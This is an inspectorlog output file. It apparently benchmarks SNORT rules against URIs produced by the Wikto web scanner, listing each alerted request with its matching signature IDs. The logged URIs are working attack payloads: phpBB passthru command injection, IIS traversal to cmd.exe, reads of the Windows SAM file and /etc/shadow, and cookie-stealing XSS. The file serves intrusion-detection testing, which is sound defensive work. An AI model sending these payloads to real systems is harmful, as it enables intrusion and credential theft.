# inspectorlog v3.5
#----- Initializing Rules (SNORT) ---------------------
# Rules directory : "/home/kali/Downloads/reglas_javi/snort"
#	Opening SNORT rule file /home/kali/Downloads/reglas_javi/snort/http_uri-sn-20220324.rules... done
#		Rules: read [3749], erroneous [0], URI [384]
#	Opening SNORT rule file /home/kali/Downloads/reglas_javi/snort/http_uri-er-20220224.rules... done
[parse_snortRule] WARNING: Line [4970] exceeds allowed number of PCRE fields
#		Rules: read [6015], erroneous [0], URI [5116]
#----- Statistics (SNORT) ------------------------------
# Read [9764] Snort rules, [5500] http-related, [0] with errors
#----- Analysis results ----------------------------
# Alerts & signatures generated from: /home/kali/Downloads/inspectorlog/inspectorlog -l wikto.uri -r /home/kali/Downloads/reglas_javi/snort -t list -o /home/kali/TFG/inspectorlog/snort/web_dinamica/security_tools_benchmarking/wikto/wikto.clean
Packet [230]	Uri [@NUKEviewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[2021390]
Packet [231]	Uri [@NUKEviewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[2021390]
Packet [232]	Uri [@NUKEviewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[2021390]
Packet [253]	Uri [/..%252f..%252f..%252f..%252f..%252f../windows/repair/samSensePostNotThereNoNosam]	Nattacks [1]	Signatures	[2030337]
Packet [254]	Uri [/..%252f..%252f..%252f..%252f..%252f../windows/repair/sam]	Nattacks [1]	Signatures	[2030337]
Packet [255]	Uri [/..%252f..%252f..%252f..%252f..%252f../winnt/repair/samSensePostNotThereNoNoam._]	Nattacks [1]	Signatures	[2030337]
Packet [256]	Uri [/..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam._]	Nattacks [1]	Signatures	[2030337]
Packet [257]	Uri [/..%252f..%252f..%252f..%252f..%252f../winnt/repair/samSensePostNotThereNoNosam]	Nattacks [1]	Signatures	[2030337]
Packet [258]	Uri [/..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam]	Nattacks [1]	Signatures	[2030337]
Packet [275]	Uri [//.adSensePostNotThereNoNobook]	Nattacks [1]	Signatures	[2008617]
Packet [323]	Uri [/[SecCheck]/..%252f..%252f../extSensePostNotThereNoNo.ini]	Nattacks [1]	Signatures	[2030337]
Packet [324]	Uri [/[SecCheck]/..%252f..%252f../ext.ini]	Nattacks [1]	Signatures	[2030337]
Packet [393]	Uri [/admin/phpinfo.php]	Nattacks [1]	Signatures	[2019526]
Packet [521]	Uri [/cfide/administrator/index.cfm]	Nattacks [1]	Signatures	[2016184]
Packet [522]	Uri [/CFIDE/administrator/index.cfm]	Nattacks [2]	Signatures	[25975]	[2016184]
Packet [523]	Uri [/cfide/Administrator/staSensePostNotThereNoNohtml]	Nattacks [1]	Signatures	[2016184]
Packet [524]	Uri [/cfide/Administrator/startstop.html]	Nattacks [1]	Signatures	[2016184]
Packet [527]	Uri [/cgi-bin/.cobalt/message/message.cgi?info=%3Cscript%3Ealert%28%27alert%27%29%3B%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [662]	Uri [/default.php?error_message=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [663]	Uri [/default.php?info_message=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [731]	Uri [/guestbook/SensePostNotThereNoNo?number=5&lng=%3Cscript%3Ealert(document.domain);%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [732]	Uri [/guestbook/?number=5&lng=%3Cscript%3Ealert(document.domain);%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [794]	Uri [//indSensePostNotThereNoNo.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000]	Nattacks [1]	Signatures	[2011141]
Packet [795]	Uri [/index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000]	Nattacks [1]	Signatures	[2011141]
Packet [796]	Uri [//indSensePostNotThereNoNo.php?=PHPE9568F34-D428-11d2-A769-00AA001ACF42]	Nattacks [1]	Signatures	[2011142]
Packet [797]	Uri [//indSensePostNotThereNoNo.php?=PHPE9568F34-D428-11d2-A769-00AA001ACF42]	Nattacks [1]	Signatures	[2011142]
Packet [798]	Uri [/index.php?=PHPE9568F34-D428-11d2-A769-00AA001ACF42]	Nattacks [1]	Signatures	[2011142]
Packet [799]	Uri [//indSensePostNotThereNoNo.php?=PHPE9568F35-D428-11d2-A769-00AA001ACF42]	Nattacks [1]	Signatures	[2011143]
Packet [800]	Uri [//indSensePostNotThereNoNo.php?=PHPE9568F35-D428-11d2-A769-00AA001ACF42]	Nattacks [1]	Signatures	[2011143]
Packet [801]	Uri [/index.php?=PHPE9568F35-D428-11d2-A769-00AA001ACF42]	Nattacks [1]	Signatures	[2011143]
Packet [802]	Uri [//indSensePostNotThereNoNo.php?=PHPE9568F36-D428-11d2-A769-00AA001ACF42]	Nattacks [1]	Signatures	[2011144]
Packet [803]	Uri [/index.php?=PHPE9568F36-D428-11d2-A769-00AA001ACF42]	Nattacks [1]	Signatures	[2011144]
Packet [1104]	Uri [/mambo/administrator/phpinfo.php]	Nattacks [1]	Signatures	[2019526]
Packet [1240]	Uri [/phpBB/phpinfo.php]	Nattacks [1]	Signatures	[2019526]
Packet [1248]	Uri [/phpinfo.php]	Nattacks [1]	Signatures	[2019526]
Packet [1250]	Uri [/phpinfo.php3]	Nattacks [1]	Signatures	[2019526]
Packet [1325]	Uri [/search.asp?term=<%00script>alert('Vulnerable')</script>]	Nattacks [1]	Signatures	[2009714]
Packet [1431]	Uri [/test/phpinfo.php]	Nattacks [1]	Signatures	[2019526]
Packet [1433]	Uri [/texis.exe/?-dump]	Nattacks [1]	Signatures	[2014704]
Packet [1435]	Uri [/texis.exe/?-version]	Nattacks [1]	Signatures	[2014704]
Packet [1554]	Uri [/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[2021390]
Packet [1555]	Uri [/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[2021390]
Packet [1563]	Uri [/web-console/ServerInfo.jsp%00]	Nattacks [1]	Signatures	[24342]
Packet [1609]	Uri [/xsql/demo/adhocsql/query.xsql?sql=select%20username%20from%20ALL_USERS]	Nattacks [2]	Signatures	[2006445]	[2010963]
Packet [1652]	Uri [/_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir]	Nattacks [2]	Signatures	[2009361]	[2009362]
Packet [1653]	Uri [/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir]	Nattacks [2]	Signatures	[2009361]	[2009362]
Packet [1761]	Uri [/c/winnt/system32/cmd.exe?/c+dir+/OG]	Nattacks [2]	Signatures	[2009361]	[2009362]
Packet [1762]	Uri [/certsrv/..%255cwinnt/system32/cmd.exe?/c+dir]	Nattacks [2]	Signatures	[2009361]	[2009362]
Packet [1763]	Uri [/certsrv/..%c0%af../winnt/system32/cmd.exe?/c+dir]	Nattacks [2]	Signatures	[2009361]	[2009362]
Packet [1764]	Uri [/cgi-bin/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir]	Nattacks [2]	Signatures	[2009361]	[2009362]
Packet [1765]	Uri [/cgi-bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir]	Nattacks [2]	Signatures	[2009361]	[2009362]
Packet [1766]	Uri [/cgi-bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir]	Nattacks [2]	Signatures	[2009361]	[2009362]
Packet [1820]	Uri [/iisadmpwd/..%255c..%255cwinnt/system32/cmd.exe?/c+dir]	Nattacks [2]	Signatures	[2009361]	[2009362]
Packet [1821]	Uri [/iisadmpwd/..%c0%af../winnt/system32/cmd.exe?/c+dir]	Nattacks [2]	Signatures	[2009361]	[2009362]
Packet [1880]	Uri [/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:%5c]	Nattacks [2]	Signatures	[2009361]	[2009362]
Packet [1881]	Uri [/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:%5c]	Nattacks [2]	Signatures	[2009361]	[2009362]
Packet [1882]	Uri [/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:%5c]	Nattacks [2]	Signatures	[2009361]	[2009362]
Packet [1883]	Uri [/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir]	Nattacks [2]	Signatures	[2009361]	[2009362]
Packet [1884]	Uri [/msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir]	Nattacks [2]	Signatures	[2009361]	[2009362]
Packet [1904]	Uri [/pbserver/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir]	Nattacks [2]	Signatures	[2009361]	[2009362]
Packet [1905]	Uri [/pbserver/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir]	Nattacks [2]	Signatures	[2009361]	[2009362]
Packet [1914]	Uri [/rpc/..%255c..%255cwinnt/system32/cmd.exe?/c+dir]	Nattacks [2]	Signatures	[2009361]	[2009362]
Packet [1915]	Uri [/rpc/..%255c..%255cwinnt/system32/cmd.exe?/c+dir]	Nattacks [2]	Signatures	[2009361]	[2009362]
Packet [1916]	Uri [/rpc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir]	Nattacks [2]	Signatures	[2009361]	[2009362]
Packet [1917]	Uri [/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir]	Nattacks [2]	Signatures	[2009361]	[2009362]
Packet [1918]	Uri [/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ver]	Nattacks [2]	Signatures	[2009361]	[2009362]
Packet [1919]	Uri [/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir]	Nattacks [2]	Signatures	[2009361]	[2009362]
Packet [1920]	Uri [/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir]	Nattacks [2]	Signatures	[2009361]	[2009362]
Packet [1921]	Uri [/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\]	Nattacks [2]	Signatures	[2009361]	[2009362]
Packet [2593]	Uri [/test.php?%3CSCRIPT%3Ealert('Vulnerable')%3C%2FSCRIPT%3E=x]	Nattacks [1]	Signatures	[2009714]
Packet [2595]	Uri [/test.shtml?%3CSCRIPT%3Ealert('Vulnerable')%3C%2FSCRIPT%3E=x]	Nattacks [1]	Signatures	[2009714]
Packet [2598]	Uri [/cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%49%4E%4E%54%2F%73%79%73%74%65%6D%33%32%2Fping.exe%20127.0.0.1]	Nattacks [2]	Signatures	[58276]	[2009362]
Packet [2600]	Uri [/cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%69%6E%64%6F%77%73%2Fping.exe%20127.0.0.1]	Nattacks [1]	Signatures	[58276]
Packet [2601]	Uri [/cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%69%6E%64%6F%77%73%2Fping.exe%20127.0.0.1]	Nattacks [1]	Signatures	[58276]
Packet [3689]	Uri [/etc/shadow+]	Nattacks [1]	Signatures	[2009485]
# N. packets [4125], [75] with alerts, N. Alerts [103]
# Execution time: 0.404594 s
